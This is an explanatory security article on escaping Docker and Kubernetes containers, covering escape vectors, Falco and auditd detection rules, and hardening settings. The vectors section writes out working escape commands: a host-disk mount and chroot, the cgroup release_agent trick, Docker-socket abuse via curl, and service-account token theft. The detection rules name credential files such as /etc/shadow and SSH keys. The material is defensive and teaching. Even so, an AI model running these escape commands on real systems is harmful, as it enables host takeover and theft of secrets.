Container Escape - Ausbruch aus Docker/Kubernetes-Containern
Container escape refers to techniques that allow an attacker to break out of a container into the host or other containers. Common attack vectors include: privileged containers (--privileged), incorrectly mounted host directories, insecure cgroup/namespace configuration, Docker socket mounts, kernel exploits, and Runc CVEs. Protection: unprivileged containers, read-only filesystems, Seccomp/AppArmor profiles, no privileged ports below 1024.
Container Escape refers to breaking out of the container sandbox onto the host system or into other containers. Containers provide isolation via Linux namespaces and cgroups—but this isolation is not as strong as hardware virtualization. Misconfigurations or vulnerabilities can bypass this isolation.
Container Isolation and Its Limitations
How container isolation works:
Linux containers are based on:
□ Namespaces: process, network, and filesystem isolation
□ cgroups: resource limits (CPU, memory)
□ Capabilities: granular permissions instead of root/non-root
□ Seccomp: whitelist of allowed syscalls
□ AppArmor/SELinux: Mandatory Access Control
Difference from VMs:
VM: Hypervisor → full hardware emulation → strong isolation
Container: shared kernel with host → weaker isolation!
→ Container escape = kernel attack (VM escape: significantly harder)
Docker privilege model:
Standard user in the container: root (UID 0) in the container namespace
BUT: root in the container ≠ root on the host
→ Namespace mapping: Container root → Host UID (e.g., 100000)
→ Exception: if no user namespace → Container root = Host root!
Container Escape Techniques
Vector 1 - Privileged Container (--privileged):
docker run --privileged nginx
→ Container has ALL Linux capabilities
→ Can: mount new devices, use raw sockets, manipulate cgroups
Trivial escape method:
# From inside the --privileged container:
mkdir /tmp/host-mount
mount /dev/sda1 /tmp/host-mount # Mount the host hard drive!
chroot /tmp/host-mount # Host filesystem as root
# → Full host access!
Or:
# cgroup v1 release_agent:
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
echo 1 > /tmp/cgrp/notify_on_release
echo "$path/cmd" > /tmp/cgrp/release_agent
sh -c "echo ... > /tmp/cgrp/x/cgroup.procs"
# → Command is executed with host privileges!
Vector 2 - Docker Socket Mounted (/var/run/docker.sock):
Commonly seen in CI/CD pipelines:
docker run -v /var/run/docker.sock:/var/run/docker.sock image
Escape:
# From inside the container:
docker run --rm -v /:/host alpine chroot /host /bin/bash
# Or:
curl -X POST --unix-socket /var/run/docker.sock \
'http://localhost/containers/create' \
-d '{"Image":"alpine","HostConfig":{"Binds":["/:/host"],"Privileged":true}}'
# → New container with host root → Escape!
Why: Docker socket = root access to Docker daemon!
If an attacker reaches the socket = full host control
Vector 3 - Sensitive Volume Mounts:
Common dangerous mounts:
-v /etc:/etc → Host /etc editable!
-v /proc:/proc → Host /proc accessible!
-v ~/.ssh:/root/.ssh → SSH keys exposed!
-v /home:/home → User home directories readable
Exploitation:
Mount /etc: → Edit /etc/crontab → Run cron as root → RCE on host
Mount /proc: → /proc/sysrq-trigger → Kernel crash
Mount /sys: → sysfs → Hardware manipulation
Vector 4 - Kernel exploits (direct attack):
Container and host share the same kernel:
→ Kernel CVE in the host → Exploit possible from the container!
Known CVEs:
CVE-2022-0492 (cgroup escape, Linux Kernel 5.x)
CVE-2019-5736 (runc overwrite, affected Docker < 18.09.2)
CVE-2019-16884 (AppArmor bypass in runc)
CVE-2020-15257 (containerd shim escape)
runc CVE-2019-5736:
→ Attacker container with special binary
→ When executing docker exec: runc binary overwritten on host
→ Next docker run: compromised runc → Host RCE!
Vector 5 - Capabilities Abuse:
Dangerous Capabilities (which containers sometimes have):
CAP_SYS_ADMIN: like --privileged, very far-reaching
CAP_NET_ADMIN: Manipulate network interfaces
CAP_SYS_PTRACE: Debug other processes (including host processes!)
CAP_NET_RAW: Raw sockets → ARP spoofing, sniffing
SYS_PTRACE exploit:
# Container has CAP_SYS_PTRACE:
# PID 1 in the container is visible to the host process (without PID namespace isolation)
# ptrace on host PID → inject shellcode into host process
Vector 6 - Kubernetes Specifics:
Service Account Credentials (too broad):
cat /var/run/secrets/kubernetes.io/serviceaccount/token
→ Default service account too powerful in many K8s clusters!
→ kubectl with token: other pods, secrets, ClusterRoleBindings?
Over-privileged service account:
kubectl auth can-i create pods -n kube-system
→ If yes: Pod with hostPath:/,privileged=true → Escape!
ETCD directly accessible:
→ Is etcd port 2379 accessible from the pod?
→ All Kubernetes secrets readable in plain text!
Detection Strategies
Detect container escapes:
Falcosecurity/Falco (Open Source):
→ Kernel-level monitoring via eBPF
→ Detects: sensitive mounts, /proc access, syscall anomalies
Important Falco rules:
- rule: Container started in privileged mode
condition: spawned_process and container and proc.name=docker and
container.privileged=true
priority: WARNING
- rule: Access to sensitive files in the container
condition: open_read and container and
fd.name in (/etc/shadow, /etc/passwd, /root/.ssh/id_rsa)
priority: CRITICAL
- rule: Docker socket access in the container
condition: open_write and container and
fd.name=/var/run/docker.sock
priority: CRITICAL
System audit (auditd):
-w /var/run/docker.sock -p rw -k docker-socket
-w /proc/sysrq-trigger -p w -k kernel-trigger
→ Log on write access to Docker socket / sysrq-trigger
Kubernetes Audit Logging:
→ Pod creation with hostPath / privileged=true → Alert!
→ Service account with cluster-admin from user namespace → Alert!
→ kubectl exec on privileged pods → Alert!
Mitigation Measures
Container Hardening:
1. No privileged containers (--privileged prohibited!):
docker run --security-opt no-new-privileges nginx
→ No privilege escalation in the container
Kubernetes:
securityContext:
allowPrivilegeEscalation: false
privileged: false
capabilities:
drop: ["ALL"] # Remove all capabilities!
2. Read-Only Root Filesystem:
docker run --read-only nginx
Kubernetes:
securityContext:
readOnlyRootFilesystem: true
→ Malware cannot write executables!
3. Do not run as root:
Dockerfile: USER 1000
Kubernetes:
securityContext:
runAsNonRoot: true
runAsUser: 1000
4. Seccomp profiles (system call filtering):
docker run --security-opt seccomp:profile.json nginx
Kubernetes:
securityContext:
seccompProfile:
type: RuntimeDefault
→ Only allowed syscalls → Reduced kernel exploit surface area
5. AppArmor profiles:
docker run --security-opt apparmor:docker-default nginx
→ MAC rules in addition to capabilities
6. No dangerous volume mounts:
□ No /var/run/docker.sock
□ No /proc, /sys, /dev
□ No /, /etc, /home
□ hostPath: avoid if possible; if necessary: readOnly: true
7. Kubernetes-specific:
□ Pod Security Admission (PSA): enforce Restricted profile
□ Network Policies: Pods may only communicate what is necessary
□ Service Account: separate SA per deployment, minimal permissions
□ automountServiceAccountToken: false if not necessary
□ ETCD: accessible only via API server, no direct pod access